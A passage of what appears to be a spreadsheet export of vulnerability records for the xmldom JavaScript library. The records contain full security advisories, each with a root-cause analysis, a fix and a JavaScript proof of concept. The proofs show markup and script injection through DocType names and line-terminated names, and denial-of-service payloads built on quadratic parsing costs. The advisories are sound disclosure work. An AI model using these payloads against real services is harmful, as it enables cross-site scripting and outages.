  A comment-injection variant (`dt.name = 'html&gt;&lt;!--INJECTED--'`, output
  `&lt;!DOCTYPE html&gt;&lt;!--INJECTED--&gt;&lt;r/&gt;`) re-parses cleanly and the injected
  comment node is enumerable, confirming the injected node is structurally live.
- **0.8.x** (v0.8.13, `e5c1480`) — `createDocumentType('html&gt;&lt;script&gt;…', '', '')`
  accepts the malicious name directly (no creation-time validation), and
  `serializeToString(doc, null, null, { requireWellFormed: true })` produces
  `&lt;!DOCTYPE html&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;r/&gt;` with no exception.

A browser reproduction does not apply: browsers keep `DocumentType.name`
`readonly`, so the direct-write vector cannot be reproduced in a browser DOM.
The injection is specific to xmldom exposing `name` as writable and serializing
it without a guard.

## Impact

Applications that build a `DocumentType` node with an attacker-influenced
`name` — via direct property write on any affected line, or via
`createDocumentType()` on 0.8.x and the unscoped package — and serialize the
document are vulnerable to XML/markup injection:

- **XML structure injection** — breaking out of the `&lt;!DOCTYPE …&gt;` declaration
  to inject arbitrary sibling elements, comments, or additional markup into the
  output.
- **XSS via XHTML** — if the serialized output is served as XHTML or processed
  by a browser-based XML parser, an injected `&lt;script&gt;` element (in the XHTML
  namespace) executes.
- **requireWellFormed bypass** — applications that adopted
  `requireWellFormed: true` as a mitigation for the prior injection CVEs
  (including the sibling DocType fields fixed by GHSA-f6ww-3ggp-fr8h) remain
  vulnerable through the DocType `name`.

## Fix Applied

Under `requireWellFormed`, the serializer validates the DocType `name` as a well-formed XML
`Name` and throws `InvalidStateError` when it is not — matching the sibling
`publicId`/`systemId`/`internalSubset` checks. Non-breaking and opt-in; ships on both maintained versions. No
creation-time change is made: 0.9.x already validates the name at `createDocumentType`, and the
0.8.x/unscoped creation gap cannot be closed without a breaking change, so it is left
unfixed.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dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);

// Default path: the ill-formed name is still emitted verbatim (injection present).
console.log(serializer.serializeToString(doc));
// &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;

// Opt-in path: serialization throws instead of emitting the breakout.
serializer.serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError
```

### Why the default stays verbatim

W3C DOM Parsing's require-well-formed flag defaults to false, and the browser
`XMLSerializer` emits the name verbatim in that default mode. Unconditionally
throwing would be an unjustified breaking change against that specified default,
so the guard is opt-in behind `{ requireWellFormed: true }`.

### Residual limitation

The default serialization path still emits the ill-formed DocType `name`
verbatim; protection applies only when `requireWellFormed: true` is passed. No
creation-time validation is added for the DocType `name`: 0.9.x already validates
at `createDocumentType`, and the 0.8.x/unscoped creation gap is left unfixed — it
cannot be closed without a breaking change.</t></is></c><c r="T50" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83608</t></is></c></row><row r="51"><c r="A51" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B51" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C51" s="5" t="inlineStr"><is><t>CVE-2026-83609</t></is></c><c r="D51" s="5" t="inlineStr" /><c r="E51" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F51" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G51" s="5" t="inlineStr" /><c r="H51" s="5" t="n"><v>0.003</v></c><c r="I51" s="5" t="inlineStr" /><c r="J51" s="5" t="inlineStr" /><c r="K51" s="5" t="inlineStr" /><c r="L51" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M51" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N51" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O51" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P51" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q51" s="5" t="inlineStr" /><c r="R51" s="5" t="inlineStr" /><c r="S51" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses xmldom's always-on, WHATWG-mandated creation-time name
validation. `createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` should
reject a malformed qualified name with `InvalidCharacterError`, but a name whose first line is
well-formed slips through and enters the DOM. On serialization it is emitted verbatim, so the
characters after the line terminator inject markup into the output. The injection reaches the default
serialization path, and enabling `requireWellFormed` does not prevent it.

## Details

`createElementNS`, `createAttributeNS`, and `createDocumentType` route through `validateQualifiedName`,
and `createAttribute` performs the analogous check; each validates the name with
`g.QName_exact.test(name)`. `QName_exact = reg('^', QName, '$')` inherits the `m` flag from xmldom's
shared regexp builder, so the matcher accepts any name whose first line is a valid `QName` and leaves
the remaining lines unconstrained (see Root Cause).

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. `validateQualifiedName` / `createAttribute` validate with `.test()` against such a production, so a
   line terminator followed by breakout markup passes and the malformed name is stored.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

const doc = impl.createDocument('urn:x', 'root', null);
const el = doc.createElementNS('urn:x', 'a\n&gt;&lt;script&gt;x&lt;/script');  // ACCEPTED (no throw)
doc.documentElement.appendChild(el);

// DEFAULT serialization — requireWellFormed NOT set:
console.log(new XMLSerializer().serializeToString(doc));
// Observed: &lt;root xmlns="urn:x"&gt;&lt;a
// &gt;&lt;script&gt;x&lt;/script/&gt;&lt;/root&gt;          &lt;-- injected element on the default path
// Control: createElementNS('urn:x', 'bad&gt;name') throws InvalidCharacterError, confirming the check is
// active and specifically bypassed by the line terminator.
```

## Impact

- **Bypass of the always-on WHATWG creation-time name validation** (`InvalidCharacterError`): a
  malformed name the standard requires be rejected at creation is instead admitted to the DOM.
- **Markup / structure injection.** An application relying on the `create*` APIs to reject malformed
  names (the standard behavior) as a trust boundary is exposed; where the serialized output reaches an
  HTML context, downstream XSS.
- **No serializer option mitigates it.** The admitted name is emitted verbatim under *both* the default
  path and `requireWellFormed: true` — the strict serializer shares the same `m`-flagged blind spot
  (the subject of the sibling serializer advisories) — so the bypassed creation-time check was the only
  layer that could have stopped it. Demonstrated for all four `create*` sites in
  `poc_creation_strict_serialization_bypass.cjs`.

## Fix Applied

`createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` now reject a name
containing a line terminator with `InvalidCharacterError` — the same result they already give for
other malformed names — because name validation now applies to the whole string. The
`requireWellFormed` serializer's name checks are corrected by the same change. The fix is
non-breaking: such a name was already invalid, and no previously-accepted well-formed name is affected.</t></is></c><c r="T51" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83609</t></is></c></row><row r="52"><c r="A52" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B52" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C52" s="5" t="inlineStr"><is><t>CVE-2026-83611</t></is></c><c r="D52" s="5" t="inlineStr" /><c r="E52" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F52" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G52" s="5" t="inlineStr" /><c r="H52" s="5" t="n"><v>0.004</v></c><c r="I52" s="5" t="inlineStr" /><c r="J52" s="5" t="inlineStr" /><c r="K52" s="5" t="inlineStr" /><c r="L52" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M52" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N52" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O52" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P52" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q52" s="5" t="inlineStr" /><c r="R52" s="5" t="inlineStr" /><c r="S52" s="5" t="inlineStr"><is><t>## Summary

xmldom's parser silently accepts a **not-well-formed end tag** whose valid name is followed by
trailing content — e.g. `&lt;/a⏎junk&gt;`. The element is closed, the trailing content is discarded, and no
error is reported, even though the XML end-tag production allows only optional whitespace after the
name and both Chromium and Firefox reject such input as `application/xml`. An application that relies
on xmldom to reject not-well-formed input therefore receives a false "valid" result for a document the
specification and browsers consider malformed.

## Details

Across every affected version, an end tag whose valid `Name` is followed by trailing content before
`&gt;` is silently accepted: the element is closed, the residue is dropped, and no error is reported. How
much leaks differs by line (see Affected Versions), but the observable weakness is the same.

On the current (`0.9.x`) line, the parser validates the end-tag name against the XML `ETag` production
with an anchored regular expression (`^ QName S? $`). That expression is compiled with the `m`
(multiline) flag by a shared builder, so `$` matches at an interior line terminator: a valid name on
the first line satisfies the anchored production and any content after the line break escapes the
check. On 0.9.x the whitespace-separated variant (`&lt;/a junk&gt;`) is already rejected; only the
line-terminator variant leaks. Older lines have no anchored end-tag validator at all, so they accept
both the line-terminator and the whitespace variant.

This is **not** content injection — the trailing content is dropped, and the resulting DOM is a normal
single-root document (`&lt;a/&gt;`). The security-relevant property is the silent acceptance of
not-well-formed input: xmldom's parse result disagrees with the specification and with browser XML
parsers, so any control that treats "xmldom parsed it without error" as "well-formed" is bypassed.

### Root Cause

On the `0.9.x` line, where the line-terminator variant specifically leaks:

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. The anchored end-tag production `^ QName S? $` is therefore satisfied by the first line alone, so
   trailing content after a line terminator is neither matched nor rejected — the malformed end tag is
   accepted and the residue silently discarded.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.
U+2028 and U+2029 are not XML whitespace, so they are non-conforming trailing content that nonetheless
leaks because the JavaScript `$` anchor treats them as line boundaries under `m`.

## Affected Versions

Both maintained versions are affected and fixed:

- **`0.9.x`** (`&gt;= 0.9.0, &lt;= 0.9.11`) → **`0.9.12`**: the anchored end-tag validator's `m` flag leaks
  the line-terminator variant. The whitespace variant (`&lt;/a junk&gt;`) is already rejected on this line.
- **`0.8.x`** (`&gt;= 0.8.0, &lt;= 0.8.14`) → **`0.8.15`**: no anchored end-tag validator at all — both the
  line-terminator and the whitespace variant are silently accepted; the fix adds a residue check.

`release-0.7.x` (`&lt;= 0.7.13`) and the unscoped `xmldom` package (range `*`, last release 0.6.0) are
**affected but will not be patched** — they are end-of-life / unmaintained. They share the older-line
behavior (both variants silently accepted, residue dropped).

## Proof of Concept

```js
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMParser().parseFromString('&lt;a&gt;&lt;/a\njunk&gt;', 'text/xml'); // no error
console.log(new XMLSerializer().serializeToString(doc));
// Observed: &lt;a/&gt;   — the malformed end tag is accepted, "junk" silently discarded, no error reported.
// Expected (per XML spec / Chromium / Firefox): a parse error — the input is not well-formed.
```

## Impact

- **Silent acceptance of not-well-formed XML**: a document the specification and browser XML parsers
  reject is parsed without error.
- **Bypass of a well-formedness / parse-before-trust gate**: an application relying on xmldom to
  reject malformed input treats such a document as valid. Note this is an input-validation /
  parser-differential issue, not content injection — the trailing content is discarded.

## Fix Applied

The parser now reports a not-well-formed end tag whose valid name is followed by trailing content, on both `0.9.12` and `0.8.15` — previously it was accepted silently — and parsing recovers to the byte-identical DOM as before.\
On `0.9.12` the anchored end-tag validator is corrected so a line break followed by trailing content no longer satisfies it, reported as a recoverable `error` when parsing as XML and a `warning` when parsing as HTML.\
On `0.8.15`, which previously performed no end-tag residue validation, an equivalent residue check is added, reported as a recoverable `error` in both XML and HTML.\
Well-formed documents are unaffected.

Because the report is recoverable, the fix is non-breaking: no previously-parsed document begins to
throw and no serialized output changes. Consumers that want strict rejection can escalate the reported
`error` to a fatal one via the parser's error handler (`onError` in `0.9.12`, `errorHandler` in
`0.8.15`). The two versions also differ in the whitespace-separated variant (`&lt;/a junk&gt;`): `0.9.12`
already rejected it with a fatal error in XML and continues to, while `0.8.15` — which validated
neither variant — now emits the same recoverable report for both the whitespace and line-break
variants.

### Residual limitation

By default the parser still **recovers** (it does not reject the document); the reported condition is a
recoverable `error`/`warning`, not a fatal error, to avoid changing the parsed output in a patch
release. Converting this and the other not-well-formed-acceptance cases to a consistent `fatalError` —
including the broader end-tag leniency on the older versions — is deferred to the next breaking release,
tracked at [xmldom/xmldom#1074](https://github.com/xmldom/xmldom/issues/1074).</t></is></c><c r="T52" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83611</t></is></c></row><row r="53"><c r="A53" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B53" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C53" s="5" t="inlineStr"><is><t>CVE-2026-83612</t></is></c><c r="D53" s="5" t="inlineStr" /><c r="E53" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F53" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G53" s="5" t="inlineStr" /><c r="H53" s="5" t="n"><v>0.003</v></c><c r="I53" s="5" t="inlineStr" /><c r="J53" s="5" t="inlineStr" /><c r="K53" s="5" t="inlineStr" /><c r="L53" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M53" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N53" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O53" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P53" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q53" s="5" t="inlineStr" /><c r="R53" s="5" t="inlineStr" /><c r="S53" s="5" t="inlineStr"><is><t>## Summary

In HTML mode (`text/html`), a raw-text element (`script`, `style`, `textarea`, `title`) whose closing
tag differs in case from its opening tag (e.g. `&lt;/ScRiPt&gt;` for `&lt;script&gt;`) is mishandled by the
parser, producing quadratic (O(n²)) output growth — a small crafted document parses and serializes
into output orders of magnitude larger, exhausting CPU and memory. A modest input of tens of KB can
therefore cause a denial of service in any service that parses untrusted HTML with xmldom. Only HTML
mode is affected.

## Details

The parser calls `parseHtmlSpecialContent` for each raw-text element in HTML mode, matched via
`isHTMLRawTextElement` / `isHTMLEscapableRawTextElement` (so all four types — `script`, `style`,
`textarea`, `title` — are in scope). It searches for the element's closing tag with
`source.indexOf('&lt;/' + tagName + '&gt;', elStartEnd)`, a byte-for-byte case-sensitive match. A
mixed-case closing tag never matches, so the search returns `-1`, and the following
`source.substring(elStartEnd + 1, -1)` extracts text backwards from the start of the document
instead of the element's content. The function then returns `-1` to the parse loop, which cannot
advance normally and falls back to character-by-character reprocessing. Every raw-text element
re-captures all source text preceding it, so output grows as O(n²) in the number of such elements.

### Root Cause

1. **Case-sensitive close-tag search** (`lib/sax.js:549`): `source.indexOf('&lt;/' + tagName + '&gt;',
   elStartEnd)` does not fold case, contrary to the WHATWG HTML RAWTEXT end-tag-name rule.
2. **Unguarded `-1`** (`lib/sax.js:550`): `source.substring(elStartEnd + 1, elEndStart)` runs even
   when `elEndStart === -1`, extracting text backwards from position 0.
3. **Unstable progression** (`lib/sax.js:556`): the function returns `elEndStart` (`-1`), driving
   repeated character-by-character fallback in the parse loop.

## Affected Versions

Only the `0.9.x` line is affected — the amplification was introduced in `0.9.0-beta.1` when
`parseHtmlSpecialContent` was refactored, and remains through `0.9.11`. The `0.8.x` line is **not**
affected: its older `parseHtmlSpecialContent` does not amplify, despite sharing the same
case-sensitive `indexOf`.

## Proof of Concept

```js
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');

const n = 1000;
const payload = '&lt;html&gt;&lt;body&gt;' + '&lt;script&gt;x&lt;/ScRiPt&gt;'.repeat(n) + '&lt;/body&gt;&lt;/html&gt;';
const doc = new DOMParser().parseFromString(payload, 'text/html');
const out = new XMLSerializer().serializeToString(doc);
console.log(payload.length, out.length, (out.length / payload.length).toFixed(1) + 'x');
// 18026 9037063 501.3x  — an 18 KB input yields ~9 MB of output
```

Output size grows quadratically with the number of case-mismatched raw-text elements:

```
Repeats | Input len | Output len | Ratio
1       | 44        | 109        | 2.5x
100     | 1826      | 93763      | 51.3x
500     | 9026      | 2268563    | 251.3x
1000    | 18026     | 9037063    | 501.3x
2000    | 36026     | 36074063   | 1001.3x
```

Proof of Concept from @KarimTantawey (tested with `script`); the same amplification occurs for `style`,
`textarea`, and `title`.

## Impact

Small attacker payloads can force disproportionate CPU and memory usage in services that
parse and serialize untrusted HTML via xmldom. The quadratic growth means a modest-sized input
(tens of kilobytes) can produce output in the tens or hundreds of megabytes, potentially
exhausting memory or causing timeouts.

The attack only requires HTML mode (`text/html` MIME type) and mixed-case closing tags for
any of the four raw-text element types. No special configuration or error handler setup is needed.

## Severity note

The CVSS 4.0 vector scores availability only (`VA:H`, with `VC:N/VI:N`): the flaw neither discloses
nor corrupts data, but a small untrusted HTML input (tens of KB) can force output and memory in the
tens to hundreds of MB, enough to exhaust a service's heap or stall its event loop. It is reachable
with no authentication, configuration, or error-handler setup — only that the application parses
untrusted `text/html` and serializes the result.

## Fix Applied

The raw-text closing tag is now matched case-insensitively in HTML raw-text mode (per the WHATWG HTML
[RAWTEXT end-tag rule](https://html.spec.whatwg.org/multipage/parsing.html#rawtext-end-tag-name-state)),
and a missing closing tag is handled explicitly, removing the quadratic output amplification. Output
for well-formed input is unchanged. Non-breaking; 0.9.x-only.</t></is></c><c r="T53" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83612</t></is></c></row><row r="54"><c r="A54" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B54" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C54" s="5" t="inlineStr"><is><t>CVE-2026-83613</t></is></c><c r="D54" s="5" t="inlineStr" /><c r="E54" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F54" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G54" s="5" t="inlineStr" /><c r="H54" s="5" t="n"><v>0.003</v></c><c r="I54" s="5" t="inlineStr" /><c r="J54" s="5" t="inlineStr" /><c r="K54" s="5" t="inlineStr" /><c r="L54" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M54" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N54" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O54" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P54" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q54" s="5" t="inlineStr" /><c r="R54" s="5" t="inlineStr" /><c r="S54" s="5" t="inlineStr"><is><t>## Summary

xmldom builds the attribute collection of every parsed element by inserting attributes one at a
time into a DOM `NamedNodeMap`. Each insertion first performs a **linear scan of all
already-inserted attributes** to enforce the DOM uniqueness rule (no two attributes with the same
qualified name / namespace+local-name). Parsing an element that carries `M` distinct attributes
therefore costs `1 + 2 + … + M = O(M²)` comparisons.

Because the trigger is simply "one element with many attributes", the attack payload is a
**fully well-formed XML document**. No malformed markup, no error recovery, and no non-default
parser options are involved — parsing completes silently with zero `warning`/`error`/`fatalError`
events. An attacker who can submit a modest, highly compressible document (a single element with
tens of thousands of attributes, ~340 KB uncompressed) can consume seconds of single-threaded CPU
per request, enabling an unauthenticated denial of service.

This is distinct from the known quadratic-**memory** namespace-map issue: it burns **CPU** and it
does not require any namespace declarations or nesting.

## Details

The DOM content handler adds each attribute of a starting element by calling
`el.setAttributeNode(attr)` in a loop:

```js
// DOMHandler.startElement
for (var i = 0; i &lt; len; i++) {
	var namespaceURI = attrs.getURI(i);
	var value = attrs.getValue(i);
	var qName = attrs.getQName(i);
	var attr = doc.createAttributeNS(namespaceURI, qName);
	attr.value = attr.nodeValue = value;
	el.setAttributeNode(attr);          // O(existing attrs) each — see below
}
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L370-L387

`setAttributeNode` delegates to `NamedNodeMap.setNamedItem`, which calls `getNamedItemNS` to look
for an existing attribute with the same namespace URI and local name before appending:

```js
setNamedItem: function (attr) {
	var el = attr.ownerElement;
	if (el &amp;&amp; el !== this._ownerElement) {
		throw new DOMException(DOMException.INUSE_ATTRIBUTE_ERR);
	}
	var oldAttr = this.getNamedItemNS(attr.namespaceURI, attr.localName);  // linear scan
	if (oldAttr === attr) {
		return attr;
	}
	_addNamedNode(this._ownerElement, this, attr, oldAttr);
	return oldAttr;
},
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L612-L623

`getNamedItemNS` walks the whole list on every call:

```js
getNamedItemNS: function (namespaceURI, localName) {
	if (!namespaceURI) {
		namespaceURI = null;
	}
	var i = 0;
	while (i &lt; this.length) {
		var node = this[i];
		if (node.localName === localName &amp;&amp; node.namespaceURI === namespaceURI) {
			return node;
		}
		i++;
	}
	return null;
},
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L702-L715

For the i-th attribute the scan visits `i-1` entries, so inserting `M` distinct attributes performs
`Θ(M²)` comparisons. There is no hash index or set keyed by name; the map is a plain
array-backed structure.

The same structure exists on 0.8.x. There `setNamedItem` dedups via
`getNamedItem(attr.nodeName)` instead of `getNamedItemNS`, but that method is likewise a full linear
scan, so the complexity is identical:

- `startElement` loop / `setAttributeNode`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L159-L176
- `setNamedItem` → linear `getNamedItem`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L286-L308

The linear-scan `NamedNodeMap` predates the `@xmldom/xmldom` fork and is present unchanged in the
unscoped `xmldom` package back to its earliest published release. In `xmldom@0.1.0`, parsing already
inserts each attribute one at a time (`DOMHandler.startElement` loops calling
`setAttributeNS` → `setAttributeNode` → `NamedNodeMap.setNamedItem`), and `setNamedItem` dedups by
calling `getNamedItemNS`, which is a full linear `while (i--)` scan of the already-inserted
attributes — the identical `O(M²)` structure. The whole unscoped line (`0.1.0` … `0.6.0`) is
therefore affected; the earliest published tag (`0.1.0`) was verified to contain the per-insert
linear dedup scan.

## Proof of Concept

A single well-formed element with `M` distinct attributes. No malformed markup and no options:

```js
'use strict';
var DOMParser = require('@xmldom/xmldom').DOMParser;

function buildDoc(m) {
	var parts = new Array(m);
	for (var i = 0; i &lt; m; i++) parts[i] = 'a' + i + '="x"';
	return '&lt;r ' + parts.join(' ') + '/&gt;';   // &lt;r a0="x" a1="x" ... a{M-1}="x"/&gt;
}

for (var _i = 0, sizes = [2000, 4000, 8000, 16000, 32000]; _i &lt; sizes.length; _i++) {
	var m = sizes[_i];
	var xml = buildDoc(m);
	var t0 = process.hrtime.bigint();
	var doc = new DOMParser().parseFromString(xml, 'text/xml');  // silent: no error events
	var ms = Number(process.hrtime.bigint() - t0) / 1e6;
	console.log(m + ' attrs, ' + xml.length + ' bytes -&gt; ' + ms.toFixed(1) + ' ms; parsed=' +
		doc.documentElement.attributes.length);
}
```

Measured with Node.js v18.20.8 (wall-clock; absolute numbers vary by host, the **scaling** is the
load-bearing fact):

**`@xmldom/xmldom` 0.9.10:**

| M (attributes) | input bytes | time (ms) | ratio vs prev |
|---:|---:|---:|---:|
| 2000  | 18,894  | 13.4   | —     |
| 4000  | 38,894  | 38.7   | ×2.9  |
| 8000  | 78,894  | 100.8  | ×2.6  |
| 16000 | 164,894 | 406.2  | ×4.0  |
| 32000 | 340,894 | 2149.5 | ×5.3  |

**`@xmldom/xmldom` 0.8.13:**

| M (attributes) | input bytes | time (ms) |
|---:|---:|---:|
| 2000  | 18,894  | 10.6   |
| 4000  | 38,894  | 19.9   |
| 8000  | 78,894  | 75.9   |
| 16000 | 164,894 | 657.7  |
| 32000 | 340,894 | 1643.2 |

**`xmldom` (unscoped) 0.6.0:** 4000 → 28.2 ms, 8000 → 131.8 ms, 16000 → 545.2 ms (≈ ×4 per doubling).

Time grows ≈ ×4 per doubling of `M` — quadratic. About **340 KB of well-formed input costs ~1.6–2.1 s
of single-threaded CPU**, and it keeps scaling: doubling the attribute count quadruples the cost.
The document is trivially generated and compresses to a few kilobytes on the wire.

## Impact

Unauthenticated, remotely triggerable denial of service against any service that parses
attacker-influenced XML/HTML with xmldom. A single request holds one event-loop thread for seconds;
a handful of concurrent requests can saturate CPU and stall the process. Because the payload is a
plain well-formed document (one element, many attributes), it passes any "must be well-formed" gate
and reaches the parser before any application-level validation (e.g. schema checks or signature
verification) can run. The payload is highly compressible, so it is effective over compressed
transports.

## Fix Applied

Replaced the per-insert linear duplicate scan on the parse-time dedup path with a name-keyed
index, so de-duplicating an element's attributes during parse is O(M) instead of O(M²) — a
well-formed-but-hostile attribute list can no longer wedge the parse. Behavior-preserving: attribute
order and duplicate resolution (last value wins, first position kept) are byte-identical. Non-breaking
and independent of `requireWellFormed`; ships on both maintained versions.</t></is></c><c r="T54" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83613</t></is></c></row><row r="55"><c r="A55" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B55" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C55" s="5" t="inlineStr"><is><t>CVE-2026-83614</t></is></c><c r="D55" s="5" t="inlineStr" /><c r="E55" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F55" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G55" s="5" t="inlineStr" /><c r="H55" s="5" t="n"><v>0.004</v></c><c r="I55" s="5" t="inlineStr" /><c r="J55" s="5" t="inlineStr" /><c r="K55" s="5" t="inlineStr" /><c r="L55" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M55" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N55" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O55" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P55" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q55" s="5" t="inlineStr" /><c r="R55" s="5" t="inlineStr" /><c r="S55" s="5" t="inlineStr"><is><t>## Summary

`xmldom`'s malformed-input **error-recovery path** has two quadratic-time (O(n²)) behaviors that a
single crafted input triggers together, so a tiny, highly compressible document (tens of KB) stalls
the Node.js event loop for multiple seconds. It is reachable from `DOMParser.parseFromString` under
**default options** — i.e. from unauthenticated, network-delivered XML — making this an unauthenticated
denial of service. One of the two behaviors, the `normalize()` adjacent-text merge, is **additionally
reachable programmatically** — via a plain `normalize()` call on a DOM built with adjacent text nodes,
independent of the parser — so its fix must live in `normalize()`, not only in a parser bound.

## Details

### Finding A — `parseElementStartPart` quadratic re-scan

A `&lt;` character is not a delimiter in any tag-parsing state, so `parseElementStartPart` scans
forward character-by-character over any embedded `&lt;` until it reaches the next `&gt;` (or end of
input), then validates the accumulated slice as a tag name and throws `invalid tagName:` on failure.
The main loop catches this, reports an `error`, sets `end = -1`, and recovers by advancing a single
character (`appendText(Math.max(tagStart, start) + 1)`). With a long run of `&lt;` and a distant `&gt;`,
each of the O(n) recovery retries performs an O(n) scan plus an O(n) anchored regex validation over
the growing candidate ⇒ **O(n²)**.

Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):

- `parseElementStartPart` character scan — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L263-L461
- tag-name validation (`setTagName` → throws `invalid tagName`) — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L886-L891
- main-loop `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L234-L242
- single-character recovery fallback — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L247

Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):

- `parseElementStartPart` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L227
- `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L202-L208
- recovery fallback — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L213
- `setTagName` validation — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L616-L621

### Finding B — `normalize()` adjacent-text O(K²) merge

`endDocument()` calls `document.normalize()`. For a parent with K adjacent text nodes (produced by
the one-character recovery of Finding A), `normalize()` performs K−1 merges. Each merge does a
`removeChild` — which re-indexes **all** child nodes of the parent (O(K)) — and an `appendData` —
which rebuilds the accumulator string `this.data + text` (O(K)). Total: **O(K²)**.

Well-formed XML cannot produce adjacent text-node siblings *through the parser* (each text run is one
node; comments, CDATA, PIs, and elements sit between runs), so the **parse-path** trigger for Finding B
is the malformed-input recovery that emits single-character text nodes. The same O(K²) merge is,
however, independently reachable via the public `normalize()` API on a programmatically built tree
(see "Finding B is additionally reachable programmatically" below).

Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):

- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L418-L420
